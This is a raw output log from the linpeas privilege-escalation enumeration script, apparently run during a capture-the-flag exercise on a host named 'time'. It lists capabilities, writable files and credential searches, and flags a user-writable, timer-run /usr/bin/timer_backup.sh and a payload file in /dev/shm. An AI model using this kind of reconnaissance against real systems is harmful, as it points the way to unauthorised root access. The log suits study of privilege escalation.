/etc/ld.so.preload ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation ══╣ Current shell capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read CapAmb: 0x0000000000000000=
══╣ Parent process capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50): /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep
╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation ╔══════════╣ AppArmor binary profiles -rw-r--r-- 1 root root 3222 Mar 11 2020 sbin.dhclient -rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man -rw-r--r-- 1 root root 26245 Jul 10 2020 usr.lib.snapd.snap-confine.real -rw-r--r-- 1 root root 2006 Aug 4 2020 usr.sbin.mysqld -rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd -rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation files with acls in searched folders Not Found ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation total 36 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh -rw-r--r-- 1 root root 825 Apr 10 2020 apps-bin-path.sh -rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh -rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh -rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh -rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/pericles/.bash_history /home/pericles/.lhistory /root/ /var/www /var/www/html/js /var/www/html/js/main.js /var/www/html/index.php /var/www/html/vendor /var/www/html/vendor/select2 /var/www/html/vendor/select2/select2.js /var/www/html/vendor/select2/select2.min.js /var/www/html/vendor/select2/select2.min.css /var/www/html/vendor/select2/select2.css /var/www/html/vendor/bootstrap /var/www/html/vendor/bootstrap/js /var/www/html/vendor/bootstrap/js/bootstrap.min.js /var/www/html/vendor/bootstrap/js/bootstrap.js /var/www/html/vendor/bootstrap/js/popper.min.js /var/www/html/vendor/bootstrap/js/popper.js /var/www/html/vendor/bootstrap/js/tooltip.js /var/www/html/vendor/bootstrap/css /var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css /var/www/html/vendor/bootstrap/css/bootstrap.min.css.map /var/www/html/vendor/bootstrap/css/bootstrap-reboot.css /var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css.map /var/www/html/vendor/bootstrap/css/bootstrap.css /var/www/html/vendor/bootstrap/css/bootstrap-grid.css /var/www/html/vendor/bootstrap/css/bootstrap-reboot.css.map /var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css.map
╔══════════╣ Searching folders owned by me containing others files on it (limit 100) -rwxr-xr-x 1 root root 11119 Oct 20 2020 main.css -rwxr-xr-x 1 root root 12608 Dec 18 2017 img-01.png -rwxr-xr-x 1 root root 1420 Dec 18 2017 main.js -rwxr-xr-x 1 root root 4657 Oct 22 2020 /var/www/html/index.php -rwxr-xr-x 1 root root 86814 Dec 13 2017 util.css drwxr-xr-x 2 root root 4096 Dec 16 2021 icons drwxr-xr-x 2 root root 4096 Dec 16 2021 animate drwxr-xr-x 2 root root 4096 Dec 16 2021 css-hamburgers drwxr-xr-x 2 root root 4096 Dec 16 2021 jquery drwxr-xr-x 2 root root 4096 Dec 16 2021 montserrat drwxr-xr-x 2 root root 4096 Dec 16 2021 poppins drwxr-xr-x 2 root root 4096 Dec 16 2021 raleway drwxr-xr-x 2 root root 4096 Dec 16 2021 select2 drwxr-xr-x 3 root root 4096 Dec 16 2021 Linearicons-Free-v1.0.0 drwxr-xr-x 4 root root 4096 Dec 16 2021 bootstrap drwxr-xr-x 6 root root 4096 Dec 16 2021 font-awesome-4.7.0 total 100 total 20 total 4
╔══════════╣ Readable files belonging to root and readable by me but not world readable ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /dev/mqueue /dev/shm /dev/shm/payload2kCy7H /home/pericles /opt/json_project/classpath /opt/json_project/classpath/h2-1.4.199.jar /opt/json_project/classpath/jackson-annotations-2.9.8.jar /opt/json_project/classpath/jackson-core-2.9.8.jar /opt/json_project/classpath/jackson-databind-2.9.8.jar /opt/json_project/classpath/logback-core-1.3.0-alpha5.jar /opt/json_project/parse.rb /run/lock /run/lock/apache2 /run/screen /snap/core18/1705/run/lock /snap/core18/1705/tmp /snap/core18/1705/var/tmp /snap/core18/1885/tmp /snap/core18/1885/var/tmp /tmp /tmp/hsperfdata_pericles /tmp/hsperfdata_pericles/12827 /tmp/linpeas.sh /tmp/tmux-1000 /usr/bin/timer_backup.sh /var/crash /var/lib/php/sessions /var/tmp /var/www/html
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation Group pericles: /usr/bin/timer_backup.sh
╔═════════════════════════╗ ════════════════════════════╣ Other Interesting Files ╠════════════════════════════ ╚═════════════════════════╝ ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /usr/bin/gettext.sh You own the script: /usr/bin/timer_backup.sh /usr/bin/rescan-scsi-bus.sh
╔══════════╣ Executable files potentially added by user (limit 70) 2024-01-13+13:40:01.1738805480 /usr/bin/timer_backup.sh 2020-10-22+21:08:28.9674030500 /var/www/html/index.php 2020-10-22+19:13:27.2314030500 /opt/json_project/parse.rb 2020-10-22+19:04:30.1154030500 /opt/json_project/parse.rb.orig 2020-10-20+19:48:11.0231137870 /var/www/html/css/main.css 2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_terminal.sh 2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_keyboard.sh 2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_font.sh 2020-09-20+11:48:54.0488215730 /etc/network/if-up.d/mtuipv6 2020-09-20+11:48:54.0488215730 /etc/network/if-pre-up.d/mtuipv6
╔══════════╣ Unexpected in /opt (usually empty) total 12 drwxr-xr-x 3 root root 4096 Dec 16 2021 . drwxr-xr-x 20 root root 4096 Jan 13 13:43 .. drwxr-xr-x 3 root root 4096 Dec 16 2021 json_project
╔══════════╣ Unexpected in root /test
╔══════════╣ Modified interesting files in the last 5mins (limit 100) /usr/bin/timer_backup.sh /tmp/hsperfdata_pericles/12827 /var/log/kern.log /var/log/auth.log /var/log/syslog /var/log/journal/151d23267a7548479f1d63a9000ddfb3/system.journal /var/log/journal/151d23267a7548479f1d63a9000ddfb3/user-1000.journal
╔══════════╣ Writable log files (logrotten) (limit 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation logrotate 3.14.0
Default mail command: /usr/bin/mail Default compress command: /bin/gzip Default uncompress command: /bin/gunzip Default compress extension: .gz Default state file path: /var/lib/logrotate/status ACL support: yes SELinux support: yes
╔══════════╣ Files inside /home/pericles (limit 20) total 44 drwxr-xr-x 7 pericles pericles 4096 Dec 16 2021 . drwxr-xr-x 3 root root 4096 Dec 16 2021 .. lrwxrwxrwx 1 root root 9 Oct 1 2020 .bash_history -> /dev/null -rw-r--r-- 1 pericles pericles 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 pericles pericles 3771 Feb 25 2020 .bashrc drwx------ 2 pericles pericles 4096 Dec 16 2021 .cache drwx------ 3 pericles pericles 4096 Dec 16 2021 .config drwx------ 3 pericles pericles 4096 Jan 13 13:42 .gnupg lrwxrwxrwx 1 root root 9 Oct 1 2020 .lhistory -> /dev/null drwxrwxr-x 3 pericles pericles 4096 Dec 16 2021 .local -rw-r--r-- 1 pericles pericles 807 Feb 25 2020 .profile drwxr-xr-x 3 pericles pericles 4096 Dec 16 2021 snap -r-------- 1 pericles pericles 33 Jan 13 12:27 user.txt
╔══════════╣ Files inside others home (limit 20) /var/www/html/js/main.js /var/www/html/index.php /var/www/html/vendor/select2/select2.js /var/www/html/vendor/select2/select2.min.js /var/www/html/vendor/select2/select2.min.css /var/www/html/vendor/select2/select2.css /var/www/html/vendor/bootstrap/js/bootstrap.min.js /var/www/html/vendor/bootstrap/js/bootstrap.js /var/www/html/vendor/bootstrap/js/popper.min.js /var/www/html/vendor/bootstrap/js/popper.js /var/www/html/vendor/bootstrap/js/tooltip.js /var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css /var/www/html/vendor/bootstrap/css/bootstrap.min.css.map /var/www/html/vendor/bootstrap/css/bootstrap-reboot.css /var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css.map /var/www/html/vendor/bootstrap/css/bootstrap.css /var/www/html/vendor/bootstrap/css/bootstrap-grid.css /var/www/html/vendor/bootstrap/css/bootstrap-reboot.css.map /var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css.map /var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css
╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old -rw-r--r-- 1 root root 214 Oct 23 2020 /etc/systemd/system/timer_backup.timer -rw-r--r-- 1 root root 159 Oct 23 2020 /etc/systemd/system/timer_backup.service -rw-r--r-- 1 root root 106 Oct 23 2020 /etc/systemd/system/web_backup.service -rw-r--r-- 1 root root 8729 Sep 10 2020 /usr/lib/modules/5.4.0-48-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 8161 Sep 10 2020 /usr/lib/modules/5.4.0-48-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8737 Oct 15 2020 /usr/lib/modules/5.4.0-52-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 8169 Oct 15 2020 /usr/lib/modules/5.4.0-52-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8729 Sep 4 2020 /usr/lib/modules/5.4.0-47-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 8161 Sep 4 2020 /usr/lib/modules/5.4.0-47-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 43888 Mar 9 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 338 May 5 2020 /usr/share/ri/2.7.0/system/Bundler/EnvironmentPreserver/backup-i.ri -rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz -rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz -rw-r--r-- 1 root root 11070 Sep 20 2020 /usr/share/info/dir.old -rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rwxrw-rw- 1 pericles pericles 88 Jan 13 13:40 /usr/bin/timer_backup.sh -rw-r--r-- 1 root root 0 Oct 15 2020 /usr/src/linux-headers-5.4.0-52-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Oct 15 2020 /usr/src/linux-headers-5.4.0-52-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 237818 Oct 15 2020 /usr/src/linux-headers-5.4.0-52-generic/.config.old -rw-r--r-- 1 root root 0 Sep 10 2020 /usr/src/linux-headers-5.4.0-48-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Sep 10 2020 /usr/src/linux-headers-5.4.0-48-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 237780 Sep 10 2020 /usr/src/linux-headers-5.4.0-48-generic/.config.old -rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-47/tools/testing/selftests/net/tcp_fastopen_backup_key.sh -rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-52/tools/testing/selftests/net/tcp_fastopen_backup_key.sh -rw-r--r-- 1 root root 0 Sep 4 2020 /usr/src/linux-headers-5.4.0-47-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Sep 4 2020 /usr/src/linux-headers-5.4.0-47-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 237780 Sep 4 2020 /usr/src/linux-headers-5.4.0-47-generic/.config.old -rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-48/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001 Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001 Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20) -> Extracting tables from /var/lib/fwupd/pending.db (limit 20) ╔══════════╣ Web files?(output limit) /var/www/: total 12K drwxr-xr-x 3 root root 4.0K Dec 16 2021 . drwxr-xr-x 14 root root 4.0K Dec 16 2021 .. dr-xr-xr-x 7 pericles pericles 4.0K Dec 16 2021 html
/var/www/html: total 36K dr-xr-xr-x 7 pericles pericles 4.0K Dec 16 2021 . drwxr-xr-x 3 root root 4.0K Dec 16 2021 ..
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw------- 1 root root 0 Jan 13 12:26 /run/snapd/lock/.lock -rw-r--r-- 1 root root 0 Jan 13 12:26 /run/network/.ifstate.lock -rw------- 1 root root 0 Apr 23 2020 /etc/.pwd.lock -rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout -rw-r--r-- 1 root root 0 Oct 20 2020 /etc/.java/.systemPrefs/.system.lock -rw-r--r-- 1 root root 0 Oct 20 2020 /etc/.java/.systemPrefs/.systemRootModFile -rw-r--r-- 1 root root 2044 Jul 15 2020 /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo -rw-r--r-- 1 root root 1190 Dec 31 2019 /usr/share/doc/ruby-rspec-mocks/features/.nav -rw-r--r-- 1 root root 1016 Oct 7 2019 /usr/share/doc/ruby-rspec-expectations/features/.nav -rw-r--r-- 1 root root 1700 Dec 28 2019 /usr/share/doc/ruby-rspec-core/features/.nav -rw-r--r-- 1 root root 22 Feb 19 2020 /usr/share/rubygems-integration/all/gems/rspec-core-3.9.1/lib/rspec/core/project_initializer/.rspec -rw-r--r-- 1 pericles pericles 220 Feb 25 2020 /home/pericles/.bash_logout -rw-r--r-- 1 landscape landscape 0 Apr 23 2020 /var/lib/landscape/.cleanup.user -rw------- 1 root root 0 Mar 11 2020 /snap/core18/1705/etc/.pwd.lock -rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/1705/etc/skel/.bash_logout -rw------- 1 root root 0 Jul 24 2020 /snap/core18/1885/etc/.pwd.lock -rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/1885/etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rw------- 1 pericles pericles 32768 Jan 13 13:43 /tmp/hsperfdata_pericles/12827 -rwxr-xr-x 1 pericles pericles 847920 Dec 28 06:40 /tmp/linpeas.sh -rw-r--r-- 1 root root 61440 Oct 23 2020 /var/backups/alternatives.tar.0 -rw-r--r-- 1 root root 2490 Sep 21 2020 /var/backups/alternatives.tar.1.gz
╔══════════╣ Searching passwords in history files Binary file /usr/share/ri/2.7.0/system/Bundler/Thor/LineEditor/Readline/add_to_history%3f-i.ri matches Binary file /usr/share/ri/2.7.0/system/IRB/Context/eval_history%3d-i.ri matches /usr/share/ri/2.7.0/system/IRB/Context/eval_history-i.riU:RDoc::Attr[I"eval_history:ETI"IRB::Context publico:Doc::Markup::Documen: @parts[o:RDoc::Markup::Paragraph; I"JThe command result history limit. This method is not available until ;TI"C /usr/share/ri/2.7.0/system/IRB/Context/eval_history-i.ri:@fileI"ib/irb/ext/history.rb;T:0@omit_headings_from_table_of_contents_below0F@I"IRB::Context;TcRDoc::NormalClass0 Binary file /usr/share/ri/2.7.0/system/IRB/Context/save_history%3d-i.ri matches Binary file /usr/share/ri/2.7.0/system/IRB/Context/save_history-i.ri matches /usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb: @stats = stats /usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb: @items = { _seq_: 1 } /usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb: @threads = { _seq_: "A" }
╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/common-password /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store
/usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/keyring/credentials.py /usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/credentials.py /usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-plymouth.path /usr/lib/systemd/system/systemd-ask-password-plymouth.service
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs ╔══════════╣ Searching passwords inside logs (limit 70) base-passwd depends on libc6 (>= 2.8); however: base-passwd depends on libdebconfclient0 (>= 0.145); however: 2020-09-20 12:07:56,364 - ssh_util.py[DEBUG]: line 124: option PasswordAuthentication added with yes 2020-09-20 12:07:56,441 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon. Binary file /var/log/journal/151d23267a7548479f1d63a9000ddfb3/user-1000.journal matches Preparing to unpack .../base-passwd_3.5.47_amd64.deb ... Preparing to unpack .../passwd_1%3a4.8.1-1ubuntu5_amd64.deb ... Selecting previously unselected package base-passwd. Selecting previously unselected package passwd. Sep 20 11:49:20 ubuntu-server chage[15633]: changed password expiry for sshd Sep 20 11:49:20 ubuntu-server usermod[15626]: change user 'sshd' password Sep 20 16:55:47 ubuntu-server systemd[1]: Condition check resulted in Forward Password Requests to Plymouth Directory Watch being skipped. Sep 20 16:55:47 ubuntu-server systemd[1]: Started Dispatch Password Requests to Console Directory Watch. Sep 20 16:55:47 ubuntu-server systemd[1]: Started Forward Password Requests to Wall Directory Watch. Sep 20 16:56:11 ubuntu-server chpasswd[2091]: pam_unix(chpasswd:chauthtok): password changed for installer Sep 20 16:56:11 ubuntu-server cloud-init[2090]: Set the following 'random' passwords Setting up base-passwd (3.5.47) ... Setting up passwd (1:4.8.1-1ubuntu5) ... Shadow passwords are now on. Unpacking base-passwd (3.5.47) ... Unpacking base-passwd (3.5.47) over (3.5.47) ... Unpacking passwd (1:4.8.1-1ubuntu5) ... [ 4.790077] systemd[1]: Started Forward Password Requests to Wall Directory Watch. [ 6.876981] systemd[1]: Started Forward Password Requests to Wall Directory Watch. dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r'
pericles@time:/tmp$
|